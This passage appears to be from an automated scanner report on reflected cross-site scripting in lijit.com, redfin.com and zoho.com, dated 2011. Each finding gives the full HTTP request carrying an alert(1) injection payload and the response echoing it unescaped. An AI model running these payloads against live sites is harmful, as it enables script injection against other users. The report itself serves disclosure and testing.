Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:39 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n12), ms sea-ag1-n12 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:39 GMT
Age: 0
Content-Length: 15540
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=5173511c05'><script>alert(1)</script>4f6d59e9da6&username=buddytv&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1304125801&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D5173511c05
...[SNIP]...

1.27. http://www.lijit.com/delivery/serp [ztb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the ztb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7775e%3balert(1)//7f9ffabc75e was submitted in the ztb parameter. This input was echoed as 7775e;alert(1)//7f9ffabc75e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=517357775e%3balert(1)//7f9ffabc75e&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:45 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n7), ms sea-ag1-n7 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:45 GMT
Age: 0
Content-Length: 15401
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
ipt = true;
var canFireSkyNoAdsScript = true;
var textAdNoAdsZoneId = 28664;
var skyscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 51423;
var textAdBottomZoneId = 517357775e;alert(1)//7f9ffabc75e;
var skyCnt=0;

var textAdCnt=2 ;

var zone51423Delivered = false;

var zone517357775e;alert(1)//7f9ffabc75eDelivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoo
...[SNIP]...

1.28. http://www.lijit.com/search [trackresize parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/search

Issue detail

The value of the trackresize request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7237"><script>alert(1)</script>006a39a9292 was submitted in the trackresize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=truea7237"><script>alert(1)</script>006a39a9292&q=xss%20xss%20cd%20fgytr%20ghjk HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; tpro=eJyVUstuxCAM%2FBefUWpC3vce%2BwVthRAhCVICEWErVav8ew2rbnvNbWzNjMeYO%2BzBT3Y1MNxhNm40IaFNpQ4WlWAwmd%2Bqbk8Gas5cIXlJPQacUPtAnRRV4vWcgahl1acCWwY1yn29Hbnk5BGUziZa3TQMxFZTkGrLLuqwymW02GPPwMclxUJS6sWuYzAuqZ3Pw3oG3%2BbP2zrtt%2ByOUmBqpzQomwcmdoOSY65KykbwGa6q0gi%2FruaxpPMuLy7EvzYWDcnmoEZ56CXFItFhY8rwfs8IBngzo1UfL68umhCVdZtxEWi7SPsK3nUdlm19skv89hq%2Fv%2BYv8Jq%2FwO78fB6H%2Fky06d2faSsGmx%2Bl9jdSDg2DLxMO6%2Bl0wAuE8%2FwBFQm5yA%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:40:38 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n12), ms sea-ag1-n12 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:40:38 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Lijit | Search - xss xss cd fgytr ghjk</title>
<meta
...[SNIP]...
<input type="hidden" name="trackresize" value="truea7237"><script>alert(1)</script>006a39a9292" />
...[SNIP]...

1.29. http://www.lijit.com/search [uri parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/search

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a78"><script>alert(1)</script>a5cc614c47e was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytvb1a78"><script>alert(1)</script>a5cc614c47e&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; tpro=eJyVUstuxCAM%2FBefUWpC3vce%2BwVthRAhCVICEWErVav8ew2rbnvNbWzNjMeYO%2BzBT3Y1MNxhNm40IaFNpQ4WlWAwmd%2Bqbk8Gas5cIXlJPQacUPtAnRRV4vWcgahl1acCWwY1yn29Hbnk5BGUziZa3TQMxFZTkGrLLuqwymW02GPPwMclxUJS6sWuYzAuqZ3Pw3oG3%2BbP2zrtt%2ByOUmBqpzQomwcmdoOSY65KykbwGa6q0gi%2FruaxpPMuLy7EvzYWDcnmoEZ56CXFItFhY8rwfs8IBngzo1UfL68umhCVdZtxEWi7SPsK3nUdlm19skv89hq%2Fv%2BYv8Jq%2FwO78fB6H%2Fky06d2faSsGmx%2Bl9jdSDg2DLxMO6%2Bl0wAuE8%2FwBFQm5yA%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1

Response

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 19:40:34 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:40:33 GMT; path=/; domain=.lijit.com
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:40:33 GMT; path=/; domain=.lijit.com
Set-Cookie: kohanasession=qv6opjs2ebaj61mhis3be1c761; path=/; domain=.lijit.com
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxdjZvcGpzMmViYWo2MW1oaXMzYmUxYzc2MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e31sYXN0X2FjdGl2aXR5fGk6MTMxODg4MDQzNDs%3D; path=/; domain=.lijit.com
Content-Length: 10737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Lij
...[SNIP]...
<input type="hidden" name="destination" value="/search?unique_id=x8io6wpkPEIAAAohREkAAAB4&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytvb1a78"><script>alert(1)</script>a5cc614c47e&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk" />
...[SNIP]...

1.30. http://www.lijit.com/search [view parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/search

Issue detail

The value of the view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6db"><script>alert(1)</script>20419c2b8de was submitted in the view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained6e6db"><script>alert(1)</script>20419c2b8de&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; tpro=eJyVUstuxCAM%2FBefUWpC3vce%2BwVthRAhCVICEWErVav8ew2rbnvNbWzNjMeYO%2BzBT3Y1MNxhNm40IaFNpQ4WlWAwmd%2Bqbk8Gas5cIXlJPQacUPtAnRRV4vWcgahl1acCWwY1yn29Hbnk5BGUziZa3TQMxFZTkGrLLuqwymW02GPPwMclxUJS6sWuYzAuqZ3Pw3oG3%2BbP2zrtt%2ByOUmBqpzQomwcmdoOSY65KykbwGa6q0gi%2FruaxpPMuLy7EvzYWDcnmoEZ56CXFItFhY8rwfs8IBngzo1UfL68umhCVdZtxEWi7SPsK3nUdlm19skv89hq%2Fv%2BYv8Jq%2FwO78fB6H%2Fky06d2faSsGmx%2Bl9jdSDg2DLxMO6%2Bl0wAuE8%2FwBFQm5yA%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:40:35 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:40:35 GMT
Age: 0
Content-Length: 15037
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Lijit | Search - xss xss cd fgytr ghjk</title>
<meta
...[SNIP]...
<input type="hidden" name="destination" value="/search?unique_id=x@HAxgpkPEkAAGSejoAAAAAt&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained6e6db"><script>alert(1)</script>20419c2b8de&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk" />
...[SNIP]...

1.31. http://www.redfin.com/stingray/do/api-get-header-user-menu [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.redfin.com
Path:	/stingray/do/api-get-header-user-menu

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 14224<script>alert(1)</script>38404efc45 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stingray/do/api-get-header-user-menu?callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback14224<script>alert(1)</script>38404efc45 HTTP/1.1
Host: www.redfin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.redfin.com/about/redfin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=222895640.1805584825.1318813956.1318813956.1318813956.1; __utmz=222895640.1318813956.1.1.utmcsr=madrona.com|utmccn=(referral)|utmcmd=referral|utmcct=/venture-capital-investments/portfolio-company.asp; __utmv=222895640.none; JSESSIONID=AC659812AD80234CB7866DE3059A8897

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:38:51 GMT
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=7;FF=2;chrome=1
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Set-Cookie: RF_LAST_ACCESS=""; Domain=.redfin.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: RF_AUTH=""; Domain=.redfin.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 261
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive

dojo.io.script.jsonp_dojoIoScript1._jsonpCallback14224<script>alert(1)</script>38404efc45({}&&{"errorMessage":"Success","resultCode":0,"payload":{"data":{"userPhotoUrl":"http://img.cdn-redfin.com/v6.5.10/images/myredfin/photo/default-25x25.png"}},"version":15})

1.32. https://accounts.zoho.com/register [iamcsr cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://accounts.zoho.com
Path:	/register

Issue detail

The value of the iamcsr cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 138b3'-alert(1)-'219955ac53 was submitted in the iamcsr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /register?servicename=ZohoCRM&showheader=false&serviceurl=https%3A%2F%2Fzoho.com%2Fcrm%2Flp%2Fsignup-redirect.html&showGoogleYahoo=false&css=https://www.zoho.com/crm/theme/signup2.css HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://accounts.zoho.com/register?servicename=ZohoCRM&showheader=false&serviceurl=https%3A%2F%2Fzoho.com%2Fcrm%2Flp%2Fsignup-redirect.html&showGoogleYahoo=false&css=https://www.zoho.com/crm/theme/signup2.css
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1546431367.1318880860.1318880860.1318880860.1; __utmb=1.2.9.1318880868281; __utmc=1; __utmz=1.1318880860.1.1.utmcsr=getapp.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaxc.php; iamcsr=e67359a3-5322-4685-882f-9bfdccdbe9fd138b3'-alert(1)-'219955ac53; rtk=1318880967696; JSESSIONID=8959335B59D44587CD2A8429CAA2E510; acctsze=0

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 17 Oct 2011 19:50:41 GMT
Server: ZWS
Strict-Transport-Security: max-age=604800
Content-Length: 37553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">

<html>
<head>
<title>Create New Account</title>

<script
...[SNIP]...
var servicename ='ZohoCRM';
var partner_domain = 'null';
var blockedEmailDomain = '@zoho.com';
var csrfParam = 'iamcsrcoo=e67359a3-5322-4685-882f-9bfdccdbe9fd138b3'-alert(1)-'219955ac53';

function de(id) {
return document.getElementById(id);
}

function validateUserName(lid) {
if(lid.trim() == "") {

...[SNIP]...

Report generated by XSS.CX at Mon Oct 17 20:16:28 CDT 2011.